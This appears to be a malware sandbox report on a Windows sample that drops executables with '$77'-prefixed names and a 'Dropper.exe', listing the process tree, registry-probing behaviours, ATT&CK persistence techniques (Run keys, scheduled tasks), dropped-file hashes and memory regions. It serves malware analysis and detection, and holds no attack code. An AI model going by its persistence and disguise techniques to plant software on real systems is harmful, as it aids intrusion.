C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --no-startup-window1⤵
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:4 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=122.0.6261.70 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=122.0.2365.52 --initial-client-data=0x238,0x23c,0x240,0x234,0x2ac,0x7ff9d0222e98,0x7ff9d0222ea4,0x7ff9d0222eb02⤵
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --no-appcompat-clear --mojo-platform-channel-handle=2292 --field-trial-handle=2248,i,10247514684337323751,15511974759131734137,262144 --variations-seed-version /prefetch:32⤵
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=asset_store.mojom.AssetStoreService --lang=en-US --service-sandbox-type=asset_store_service --no-appcompat-clear --mojo-platform-channel-handle=3912 --field-trial-handle=2248,i,10247514684337323751,15511974759131734137,262144 --variations-seed-version /prefetch:82⤵
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k netsvcs -p -s Appinfo1⤵
-
C:\Windows\system32\wbem\wmiprvse.exeC:\Windows\system32\wbem\wmiprvse.exe1⤵
-
C:\Windows\System32\WaaSMedicAgent.exeC:\Windows\System32\WaaSMedicAgent.exe b765834be7b61b3dd973bea0c0d7e5ab CS5xfzsoDUSBZ/cngqUv2A.0.1.0.0.01⤵
-
C:\Windows\System32\Conhost.exe\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV12⤵
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k netsvcs -p -s wuauserv1⤵
-
C:\Windows\system32\wbem\wmiprvse.exeC:\Windows\system32\wbem\wmiprvse.exe -secured -Embedding1⤵
- Checks BIOS information in registry
- Checks SCSI registry key(s)
- Checks processor information in registry
- Enumerates system info in registry
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\servicing\TrustedInstaller.exeC:\Windows\servicing\TrustedInstaller.exe1⤵
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k netsvcs -p -s UsoSvc1⤵
-
C:\Windows\System32\mousocoreworker.exeC:\Windows\System32\mousocoreworker.exe -Embedding1⤵
- Checks processor information in registry
- Enumerates system info in registry
- Modifies data under HKEY_USERS
-
C:\Windows\winsxs\amd64_microsoft-windows-servicingstack_31bf3856ad364e35_10.0.19041.1220_none_7e21bc567c7ed16b\TiWorker.exeC:\Windows\winsxs\amd64_microsoft-windows-servicingstack_31bf3856ad364e35_10.0.19041.1220_none_7e21bc567c7ed16b\TiWorker.exe -Embedding1⤵
- Drops file in Windows directory
Network
MITRE ATT&CK Matrix ATT&CK v13
Persistence
Boot or Logon Autostart Execution
1Registry Run Keys / Startup Folder
1Scheduled Task/Job
1Scheduled Task
1Privilege Escalation
Boot or Logon Autostart Execution
1Registry Run Keys / Startup Folder
1Scheduled Task/Job
1Scheduled Task
1Replay Monitor
Loading Replay Monitor...
Downloads
-
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\77EC63BDA74BD0D0E0426DC8F8008506Filesize
290B
MD502005e59af3fbd84f4a83968fc8da952
SHA140578ee448aa3109d026e84a8b12ee9a0479ce78
SHA2561063934742a6e15a378f49d13630faf75fc99eb37432c0b2efdc9af3dad103fb
SHA512f246e9170d1b9da51b322d73fed994c7bd35a0bf6a2ddeec600e0a8a386cf82a0cfb28517e220a98d7dfb19cdc61eaf56275f1c2d16920d4f984390d98c6f0ed
-
C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\$77-scchost.exe.logFilesize
654B
MD52ff39f6c7249774be85fd60a8f9a245e
SHA1684ff36b31aedc1e587c8496c02722c6698c1c4e
SHA256e1b91642d85d98124a6a31f710e137ab7fd90dec30e74a05ab7fcf3b7887dced
SHA5121d7e8b92ef4afd463d62cfa7e8b9d1799db5bf2a263d3cd7840df2e0a1323d24eb595b5f8eb615c6cb15f9e3a7b4fc99f8dd6a3d34479222e966ec708998aed1
-
C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\Dropper.exe.logFilesize
425B
MD54eaca4566b22b01cd3bc115b9b0b2196
SHA1e743e0792c19f71740416e7b3c061d9f1336bf94
SHA25634ba0ab8d1850e7825763f413142a333ccbc05fa2b5499a28a7d27b8a1c5b4bb
SHA512bc2b1bf45203e3bb3009a7d37617b8f0f7ffa613680b32de2b963e39d2cf1650614d7035a0cf78f35a4f5cb17a2a439e2e07deaefd2a4275a62efd0a5c0184a1
-
C:\Users\Admin\AppData\Local\Temp\$77-aachost.exeFilesize
66KB
MD5514d0abd73e992c2a1622795b33f17f4
SHA196740e82d7a119d808000783507bd92690584fe6
SHA256b333ecc39a213f6ce650dd4af50d2d201ee6f80dea63ec98132220670469bf53
SHA5124600baecf44a9cbc7b33fd02d1807628597c6ecc87aeb12b653f6e3a46c951fe9cd789e100d96df8c57b5d0446397c8a639f0c7ee8ef9395c172598ce8185bc8
-
C:\Users\Admin\AppData\Local\Temp\$77-install.exeFilesize
163KB
MD51a7d1b5d24ba30c4d3d5502295ab5e89
SHA12d5e69cf335605ba0a61f0bbecbea6fc06a42563
SHA256b2cc4454c0a4fc80b1fc782c45ac7f76b1d95913d259090a2523819aeec88eb5
SHA512859180338958509934d22dbc9be9da896118739d87727eb68744713259e819551f7534440c545185f469da03c86d96e425cdf5aae3fb027bb8b7f51044e08eaa
-
C:\Users\Admin\AppData\Local\Temp\$77-penisballs.exeFilesize
256KB
MD518f497deffe88b6b2cff336a277aface
SHA14e1413241d3d3e4dbff399d179f8fd64f3ecd39e
SHA2568133c3c1e5dde7c9b4d9d5c9a07e37b733fd0223fc9d035c3f386f034a434af5
SHA51235c804ec73001fe66d57bd2fadc51cd399edbc2e550c4257f29aac5a24a9f9c030c582d50239dec41605801263fd5739444aa14f9683f99f726152cc1bb6920d
-
C:\Users\Admin\AppData\Local\Temp\$77-sdchost.exeFilesize
299KB
MD512d2d1f43b0ecf5a949adde54b1ffb65
SHA1ad0529bc9102210f3616c7b626c37d6454d44033
SHA256619b345f6803d45bcf20305efb3407a8ae26ba0aaffe38e7b5f31cb8c26101ef
SHA5120a55fc91d0bc7e3123b16b012c70c15f731c3be1f8499c733cc994fcec43d8cdf6279e0b9eedda35035423c8891e076be374c512d6506d81e1f81802af25153f
-
C:\Users\Admin\AppData\Local\Temp\tmp1C5D.tmp.batFilesize
155B
MD5cf6f69e74f621aff876514aed5d97fba
SHA15b9d4426a5b5fdc9e133805c3cbdc8f315e2f9cd
SHA2564a376d4ee53a165b79922cb37f65ec60b3c2b47c8eac3a16cad94fda1cc3376d
SHA512549d279392208b9172a102ff0aa5ed48c02d14e469cabd998d8d37b4b9a20e0e896630ab6d135a0b187f6a813c22ec0f2bd0e3185e1bb5856badaf6e466456c5
-
C:\Windows\System32\Tasks\Microsoft\Windows\UpdateOrchestrator\Schedule Maintenance WorkFilesize
2KB
MD58abf2d6067c6f3191a015f84aa9b6efe
SHA198f2b0a5cdb13cd3d82dc17bd43741bf0b3496f7
SHA256ee18bd3259f220c41062abcbe71a421da3e910df11b9f86308a16cdc3a66fbea
SHA512c2d686a6373efcff583c1ef50c144c59addb8b9c4857ccd8565cd8be3c94b0ac0273945167eb04ebd40dfb0351e4b66cffe4c4e478fb7733714630a11f765b63
-
C:\Windows\System32\Tasks\Microsoft\Windows\UpdateOrchestrator\Schedule Maintenance WorkFilesize
2KB
MD5f313c5b4f95605026428425586317353
SHA106be66fa06e1cffc54459c38d3d258f46669d01a
SHA256129d0b993cd3858af5b7e87fdf74d8e59e6f2110184b5c905df8f5f6f2c39d8b
SHA512b87a829c86eff1d10e1590b18a9909f05101a535e5f4cef914a4192956eb35a8bfef614c9f95d53783d77571687f3eb3c4e8ee2f24d23ad24e0976d8266b8890
-
C:\Windows\System32\Tasks\Microsoft\Windows\UpdateOrchestrator\Schedule Wake To WorkFilesize
2KB
MD5ceb7caa4e9c4b8d760dbf7e9e5ca44c5
SHA1a3879621f9493414d497ea6d70fbf17e283d5c08
SHA25698c054088df4957e8d6361fd2539c219bcf35f8a524aad8f5d1a95f218e990e9
SHA5121eddfbf4cb62d3c5b4755a371316304aaeabb00f01bad03fb4f925a98a2f0824f613537d86deddd648a74d694dc13ed5183e761fdc1ec92589f6fa28beb7fbff
-
C:\Windows\System32\Tasks\Microsoft\Windows\UpdateOrchestrator\Schedule Wake To WorkFilesize
2KB
MD57d612892b20e70250dbd00d0cdd4f09b
SHA163251cfa4e5d6cbf6fb14f6d8a7407dbe763d3f5
SHA256727c9e7b91e144e453d5b32e18f12508ee84dabe71bc852941d9c9b4923f9e02
SHA512f8d481f3300947d49ce5ab988a9d4e3154746afccc97081cbed1135ffb24fc107203d485dda2d5d714e74e752c614d8cfd16781ea93450fe782ffae3f77066d1
-
C:\Windows\System32\Tasks\Microsoft\Windows\UpdateOrchestrator\Schedule WorkFilesize
2KB
MD51e8e2076314d54dd72e7ee09ff8a52ab
SHA15fd0a67671430f66237f483eef39ff599b892272
SHA25655f203d6b40a39a6beba9dd3a2cb9034284f49578009835dd4f0f8e1db6ebe2f
SHA5125b0c97284923c4619d9c00cba20ce1c6d65d1826abe664c390b04283f7a663256b4a6efe51f794cb5ec82ccea80307729addde841469da8d041cbcfd94feb0f6
-
C:\Windows\System32\Tasks\Microsoft\Windows\UpdateOrchestrator\Schedule WorkFilesize
2KB
MD50b990e24f1e839462c0ac35fef1d119e
SHA19e17905f8f68f9ce0a2024d57b537aa8b39c6708
SHA256a1106ed0845cd438e074344e0fe296dc10ee121a0179e09398eaaea2357c614a
SHA512c65ba42fc0a2cb0b70888beb8ca334f7d5a8eaf954a5ef7adaecbcb4ce8d61b34858dfd9560954f95f59b4d8110a79ceaa39088b6a0caf8b42ceda41b46ec4a4
-
C:\Windows\TEMP\tmp58D9.tmp.batFilesize
163B
MD510fb0ba32d785621cf5eb84f9b8c6d20
SHA125eb07e54fdda1432e1f64a861562dbf76c840c2
SHA256e74fcf3d96338859b2790228d4eb3f822bb8573f49ba3df8c381c74d9626033d
SHA512f085a2ae4e80fd652ebf617cee7bbb3e0c75687cb2fcd7dec1e9213c7ac7a1afe5b172ebb689117c8dc2b7171aacf7e73be9f15cae1d48b2abb145df9d41fa69
-
C:\Windows\Temp\__PSScriptPolicyTest_cdvtq5xj.cqq.ps1Filesize
60B
MD5d17fe0a3f47be24a6453e9ef58c94641
SHA16ab83620379fc69f80c0242105ddffd7d98d5d9d
SHA25696ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7
SHA5125b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82
-
memory/388-102-0x00007FF9B5770000-0x00007FF9B5780000-memory.dmpFilesize
64KB
-
memory/388-95-0x00000288319C0000-0x00000288319EB000-memory.dmpFilesize
172KB
-
memory/388-101-0x00000288319C0000-0x00000288319EB000-memory.dmpFilesize
172KB
-
memory/528-106-0x000002B4E0DA0000-0x000002B4E0DCB000-memory.dmpFilesize
172KB
-
memory/632-68-0x000002832EE90000-0x000002832EEBB000-memory.dmpFilesize
172KB
-
memory/632-60-0x000002832EE60000-0x000002832EE85000-memory.dmpFilesize
148KB
-
memory/632-62-0x000002832EE90000-0x000002832EEBB000-memory.dmpFilesize
172KB
-
memory/632-69-0x00007FF9B5770000-0x00007FF9B5780000-memory.dmpFilesize
64KB
-
memory/632-61-0x000002832EE90000-0x000002832EEBB000-memory.dmpFilesize
172KB
-
memory/688-73-0x000001A6C93D0000-0x000001A6C93FB000-memory.dmpFilesize
172KB
-
memory/688-79-0x000001A6C93D0000-0x000001A6C93FB000-memory.dmpFilesize
172KB
-
memory/688-80-0x00007FF9B5770000-0x00007FF9B5780000-memory.dmpFilesize
64KB
-
memory/968-90-0x0000018F307D0000-0x0000018F307FB000-memory.dmpFilesize
172KB
-
memory/968-84-0x0000018F307D0000-0x0000018F307FB000-memory.dmpFilesize
172KB
-
memory/968-91-0x00007FF9B5770000-0x00007FF9B5780000-memory.dmpFilesize
64KB
-
memory/1308-38-0x000002161E730000-0x000002161E752000-memory.dmpFilesize
136KB
-
memory/1308-46-0x0000021636F80000-0x0000021636FAA000-memory.dmpFilesize
168KB
-
memory/1308-47-0x00007FF9F56F0000-0x00007FF9F58E5000-memory.dmpFilesize
2.0MB
-
memory/1308-48-0x00007FF9F3DB0000-0x00007FF9F3E6E000-memory.dmpFilesize
760KB
-
memory/1724-56-0x00007FF9F3DB0000-0x00007FF9F3E6E000-memory.dmpFilesize
760KB
-
memory/1724-57-0x0000000140000000-0x0000000140008000-memory.dmpFilesize
32KB
-
memory/1724-52-0x0000000140000000-0x0000000140008000-memory.dmpFilesize
32KB
-
memory/1724-49-0x0000000140000000-0x0000000140008000-memory.dmpFilesize
32KB
-
memory/1724-54-0x0000000140000000-0x0000000140008000-memory.dmpFilesize
32KB
-
memory/1724-50-0x0000000140000000-0x0000000140008000-memory.dmpFilesize
32KB
-
memory/1724-51-0x0000000140000000-0x0000000140008000-memory.dmpFilesize
32KB
-
memory/1724-55-0x00007FF9F56F0000-0x00007FF9F58E5000-memory.dmpFilesize
2.0MB
-
memory/1736-985-0x000000001CEE0000-0x000000001CF56000-memory.dmpFilesize
472KB
-
memory/1736-17-0x0000000001120000-0x0000000001126000-memory.dmpFilesize
24KB
-
memory/1736-16-0x0000000000930000-0x0000000000976000-memory.dmpFilesize
280KB
-
memory/1964-32-0x0000000074E40000-0x00000000755F0000-memory.dmpFilesize
7.7MB
-
memory/1964-4-0x0000000074E40000-0x00000000755F0000-memory.dmpFilesize
7.7MB
-
memory/2316-8-0x0000000000B90000-0x0000000000BA6000-memory.dmpFilesize
88KB
-
memory/4304-12-0x00000000009B0000-0x0000000000A02000-memory.dmpFilesize
328KB
-
memory/4544-0-0x0000000074E4E000-0x0000000074E4F000-memory.dmpFilesize
4KB
-
memory/4544-1-0x0000000000600000-0x000000000060A000-memory.dmpFilesize
40KB